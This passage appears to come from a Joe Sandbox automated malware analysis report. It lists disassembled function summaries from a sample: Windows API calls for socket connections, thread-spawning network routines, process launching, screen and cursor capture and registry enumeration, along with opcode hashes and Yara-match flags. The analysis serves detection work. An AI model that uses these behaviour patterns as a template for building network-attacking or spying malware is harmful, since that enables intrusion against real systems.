                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                        • String ID:
                        • API String ID: 3718465862-0
                        • Opcode ID: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                        • Instruction ID: 21dd105a5168550a9b540fcdb24a84def9abfbab51ce737ed9a3fc356bbae124
                        • Opcode Fuzzy Hash: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                        • Instruction Fuzzy Hash: 1A11C8711043596BF710DF70CC8AFDB7799EB88700F004929FB4596191EFB4A94987A2
                        APIs
                          • Part of subcall function 10006A00: GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006A13
                          • Part of subcall function 10006A00: sprintf.MSVCRT ref: 10006A5E
                        • RtlExitUserThread.NTDLL(00000000), ref: 10006BCA
                          • Part of subcall function 100042E0: GetTickCount.KERNEL32 ref: 100042E1
                          • Part of subcall function 100042E0: rand.MSVCRT ref: 100042E9
                        • sprintf.MSVCRT ref: 10006B7C
                          • Part of subcall function 100069C0: GetInputState.USER32 ref: 100069C3
                          • Part of subcall function 100069C0: GetCurrentThreadId.KERNEL32 ref: 100069CF
                          • Part of subcall function 100069C0: PostThreadMessageA.USER32(00000000), ref: 100069D6
                          • Part of subcall function 100069C0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100069E7
                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10006BA6
                        • Sleep.KERNEL32(000001F4), ref: 10006BAD
                        • TerminateProcess.KERNEL32(?,00000000), ref: 10006BB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$MessageProcesssprintf$CountCreateCurrentDirectoryExitInputPostSleepStateSystemTerminateTickUserrand
                        • String ID: "%s" "%s?abc=%d%d%d%d"$D
                        • API String ID: 2273885519-298079244
                        • Opcode ID: 3dd078da72f4aa0b4ac7f4d0abae9dcae982cb418f0f43f4f6240b8f213a96c0
                        • Instruction ID: e2e422187bf7f62d4a7dfdcb849eb519d2ebad81eaa5718c6418f72dd91d73fb
                        • Opcode Fuzzy Hash: 3dd078da72f4aa0b4ac7f4d0abae9dcae982cb418f0f43f4f6240b8f213a96c0
                        • Instruction Fuzzy Hash: 7B31FBB26043816FF710DB54DC41BF7B7E9EBC9744F100828F38597291DAB169498B67
                        APIs
                        • inet_addr.WS2_32(?), ref: 10006027
                        • gethostbyname.WS2_32(?), ref: 10006033
                        • inet_ntoa.WS2_32(?), ref: 1000605D
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100060CB
                        • CloseHandle.KERNEL32(00000000), ref: 100060CE
                        • CreateThread.KERNEL32(00000000,00000000,Function_00005A50,00000000,00000000,00000000), ref: 1000610A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID: gfff
                        • API String ID: 772126777-1553575800
                        • Opcode ID: 61f6dbe606caf10acae022083e96ee646558a2b8ef7fa7bd45154beb274bc8b0
                        • Instruction ID: 0c267aa21d92a451f69d0d77f992422e5ea3e4874e035255eb318ff1417f8f24
                        • Opcode Fuzzy Hash: 61f6dbe606caf10acae022083e96ee646558a2b8ef7fa7bd45154beb274bc8b0
                        • Instruction Fuzzy Hash: CA21B1367406145BE328DA399C45B2B77E3EBC4760F658229FA56EB3D0DAF4EC008615
                        APIs
                        • inet_addr.WS2_32(?), ref: 100068C7
                        • gethostbyname.WS2_32(?), ref: 100068D3
                        • inet_ntoa.WS2_32(?), ref: 100068FD
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000696B
                        • CloseHandle.KERNEL32(00000000), ref: 1000696E
                        • CreateThread.KERNEL32(00000000,00000000,100065E0,00000000,00000000,00000000), ref: 100069AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID: gfff
                        • API String ID: 772126777-1553575800
                        • Opcode ID: cc180864d079bcb22b0f7a7c6c0a3a19f8df3a68816e3ac905fa64844ec056cd
                        • Instruction ID: c63b20073011ef97e4020128f9f2a7fe8d530fad7bc28e92a0ece3fc0a9ef4fa
                        • Opcode Fuzzy Hash: cc180864d079bcb22b0f7a7c6c0a3a19f8df3a68816e3ac905fa64844ec056cd
                        • Instruction Fuzzy Hash: 4321E4367006141BE328DB399C55B1B77E7EBC8760F658229FA16D73D4CAF4DC008614
                        APIs
                        • inet_addr.WS2_32(?), ref: 100064E7
                        • gethostbyname.WS2_32(?), ref: 100064F3
                        • inet_ntoa.WS2_32(?), ref: 1000651D
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000658B
                        • CloseHandle.KERNEL32(00000000), ref: 1000658E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00006120,00000000,00000000,00000000), ref: 100065CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID: gfff
                        • API String ID: 772126777-1553575800
                        • Opcode ID: 46e3885d6f86e91add6559d647d4374089d72116cef43151df6f347bbe1fe172
                        • Instruction ID: 3a1490d0b82bde18bf422f003273374030d414e8c9d695ddb901e40ecb9a8b09
                        • Opcode Fuzzy Hash: 46e3885d6f86e91add6559d647d4374089d72116cef43151df6f347bbe1fe172
                        • Instruction Fuzzy Hash: 2121E1367006155BE328DA389C55B2A76E3EBC8760F658229FA16EB3D4CAF4EC008604
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(0000000C,?), ref: 10019066
                        • ??2@YAPAXI@Z.MSVCRT(00019018,0000000C,?), ref: 1001909A
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 100190C1
                        • CoInitialize.OLE32(00000000), ref: 100190CB
                        • CreateWindowExA.USER32(00000000,#32770,1007DEB0,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100190ED
                        • ShowWindow.USER32(00000000,00000000), ref: 100190F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@CreateWindow$EventInitializeShow
                        • String ID: #32770
                        • API String ID: 1167904864-463685578
                        • Opcode ID: 5f2cad0891328baacf2038ae1ba62bc6255f5a226d74e92da70e93358474a15a
                        • Instruction ID: fbc591a8bcf6fa824284178b701e6ac3dffbed0453eb3d377a51b14afdd182d1
                        • Opcode Fuzzy Hash: 5f2cad0891328baacf2038ae1ba62bc6255f5a226d74e92da70e93358474a15a
                        • Instruction Fuzzy Hash: E1212DB4901750DFD320DF2A8984A56FBE8FB09700F808A2EE19AC7B10D378E9448F55
                        APIs
                          • Part of subcall function 100106B0: ReleaseDC.USER32(?,?), ref: 100106CA
                          • Part of subcall function 100106B0: GetDesktopWindow.USER32 ref: 100106D0
                          • Part of subcall function 100106B0: GetDC.USER32(00000000), ref: 100106DD
                        • GetCursorPos.USER32(?), ref: 1001012A
                        • GetCursorInfo.USER32(?), ref: 1001014B
                        • DestroyCursor.USER32(?), ref: 10010174
                        • GetTickCount.KERNEL32 ref: 10010268
                        • Sleep.KERNEL32(00000001), ref: 1001027D
                        • GetTickCount.KERNEL32 ref: 1001027F
                        • GetTickCount.KERNEL32 ref: 1001028C
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 10010290
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                        • String ID:
                        • API String ID: 3294368536-0
                        • Opcode ID: 2f744981113fd58bd3e3d8a05f90d98a79edce13fd048475b8a5ffd6ae8b9cfa
                        • Instruction ID: e9fd782cb1bcb9b1701e4f8e74acacb221c63e795abc428d7567abd2cf743c69
                        • Opcode Fuzzy Hash: 2f744981113fd58bd3e3d8a05f90d98a79edce13fd048475b8a5ffd6ae8b9cfa
                        • Instruction Fuzzy Hash: C5517B757007409FD724CF28CC84A6AB3E6FBC8350B148A1DF5C68B652DBB4F9858BA1
                        APIs
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E1FA
                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 1000E22C
                        • LocalAlloc.KERNEL32(00000040,?), ref: 1000E26B
                        • ??2@YAPAXI@Z.MSVCRT(?), ref: 1000E2A8
                        • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 1000E2FD
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000E342
                        • RegCloseKey.ADVAPI32(?), ref: 1000E34F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@??3@AllocCloseEnumInfoLocalOpenQuery
                        • String ID:
                        • API String ID: 71355648-0
                        • Opcode ID: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                        • Instruction ID: 0d29100cb4f4234f2f0a58eafd3dd667aa445c0341ebf796ba77ca07b141115c
                        • Opcode Fuzzy Hash: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                        • Instruction Fuzzy Hash: 2F41BF71604355AFE314CF28C884A6BBBEAFBC8750F448A2DFA49D7240D675DD05CBA2
                        APIs
                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 00403912
                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 00403926
                        • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 00403952
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401DA5), ref: 0040398A
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401DA5), ref: 004039AC
                        • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401DA5), ref: 004039C5
                        • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401DA5), ref: 004039D8
                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A16
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                        • String ID:
                        • API String ID: 1823725401-0
                        • Opcode ID: ce19379b5c801f893dc2334789dfcac98eef8e2995b344cad91d556853cb3c64
                        • Instruction ID: ff30bfc8f9be561c5475340de208a15b64567a7b1e9e55a202f3809b281a0d3a
                        • Opcode Fuzzy Hash: ce19379b5c801f893dc2334789dfcac98eef8e2995b344cad91d556853cb3c64
                        • Instruction Fuzzy Hash: 723126F2A042546FD720BF795C8483BBE9CE64530A712053BF582F3280E5798E41466D
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 100051D0
                        • htons.WS2_32 ref: 100051F7
                        • inet_addr.WS2_32(1007DDAC), ref: 10005207
                        • socket.WS2_32(00000002,00000001,00000000), ref: 10005236
                        • connect.WS2_32(00000000,?,00000010), ref: 10005242
                        • Sleep.KERNEL32(00000028), ref: 10005246
                        • closesocket.WS2_32(00000000), ref: 10005249
                        • RtlExitUserThread.NTDLL(00000000), ref: 1000525E
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrsocket
                        • String ID:
                        • API String ID: 3058909470-0
                        • Opcode ID: 660e3d67af9de24333e36b20ce4359f9289523299145d539b21777f83b2d2bbc
                        • Instruction ID: 94ef63c873733004aa79e9f3c422adbccbd854d57dbd48bd6174a3db466a2c42
                        • Opcode Fuzzy Hash: 660e3d67af9de24333e36b20ce4359f9289523299145d539b21777f83b2d2bbc
                        • Instruction Fuzzy Hash: E31170711043A0ABF300AF65CC89B6ABBB9FF89741F00841EF69497291DBB59C448B26
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                        • String ID:
                        • API String ID: 1486965892-0
                        • Opcode ID: 2ef8863390499d5b5c96e316d1b9f118d70ca8aab9b9aa03753ca9dae948b5b4
                        • Instruction ID: d673aae80c479508691cbba635995b5dbf00140be29d5f3562972adf305b2b32
                        • Opcode Fuzzy Hash: 2ef8863390499d5b5c96e316d1b9f118d70ca8aab9b9aa03753ca9dae948b5b4
                        • Instruction Fuzzy Hash: EE51C479A00145ABDB05DF68C891BEFB7BDEF84680F00C42DF509AB345DB35A90587E1
                        APIs
                        • GetVersionExA.KERNEL32 ref: 10004846
                        • inet_addr.WS2_32(?), ref: 10004871
                        • gethostbyname.WS2_32(?), ref: 1000487D
                        • inet_ntoa.WS2_32(?), ref: 100048A7
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000491B
                        • CloseHandle.KERNEL32(00000000), ref: 1000491E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004520,00000000,00000000,00000000), ref: 1000494A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandleVersiongethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 3347725681-0
                        • Opcode ID: b6942b7a69f52a0167a8efb4442df1a2c78cd9b6a5f3ae8746464ba8319e2b3c
                        • Instruction ID: 3f7545d14604e368064a9ea0dd8a33a2503e85d3dbdce8005e2a4cef5e3f6ea5
                        • Opcode Fuzzy Hash: b6942b7a69f52a0167a8efb4442df1a2c78cd9b6a5f3ae8746464ba8319e2b3c
                        • Instruction Fuzzy Hash: 593104762007405BF328DB349C85B2B77E2EBC4760F62862DF956972D0CEB89C44C719
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 100089AC
                        • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000), ref: 100089CB
                        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 100089D4
                        • lstrlen.KERNEL32(?,?,?,00000000), ref: 100089DB
                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000000), ref: 100089E9
                        • lstrlen.KERNEL32(?,?,?,00000000), ref: 10008A17
                        • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 10008A3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                        • String ID:
                        • API String ID: 2793549963-0
                        • Opcode ID: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                        • Instruction ID: 722694e748314f2fe196516ce33186b52bae3b30c103117b11a3d139f94a5a93
                        • Opcode Fuzzy Hash: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                        • Instruction Fuzzy Hash: 9721B1727003146FE708DA78EC95A6BB6DAEBC8721F44453DFA06C73C0DAF5AD098661
                        APIs
                        • inet_addr.WS2_32(?), ref: 10005858
                        • gethostbyname.WS2_32(?), ref: 10005864
                        • inet_ntoa.WS2_32(?), ref: 1000588E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100058FC
                        • CloseHandle.KERNEL32(00000000), ref: 100058FF
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004340,00000000,00000000,00000000), ref: 10005928
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F90,00000000,00000000,00000000), ref: 1000593B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: d6b4a468b4273d7649f20adfbb0b48c854a58062e02beaf39faacaff6750e6db
                        • Instruction ID: da17f7c1703191c294c07bb024cf35e15be85521bc9bfbe2903f345ac267b1a4
                        • Opcode Fuzzy Hash: d6b4a468b4273d7649f20adfbb0b48c854a58062e02beaf39faacaff6750e6db
                        • Instruction Fuzzy Hash: CF21B4727403556BF328DB349C45B1B77E6EBC4B60F258629FA52AB2D0CEF4AC048718
                        APIs
                        • inet_addr.WS2_32(?), ref: 10005958
                        • gethostbyname.WS2_32(?), ref: 10005964
                        • inet_ntoa.WS2_32(?), ref: 1000598E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100059FC
                        • CloseHandle.KERNEL32(00000000), ref: 100059FF
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004340,00000000,00000000,00000000), ref: 10005A28
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004D90,00000000,00000000,00000000), ref: 10005A3B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: a24aeb47e8e4f84affd8849fc90bbdf463ad89d9ac262a616eb167ff7a57c66e
                        • Instruction ID: b64d95053be4bdb7238b88687d28699a329b2960da88acc2f851128c795cdab7
                        • Opcode Fuzzy Hash: a24aeb47e8e4f84affd8849fc90bbdf463ad89d9ac262a616eb167ff7a57c66e
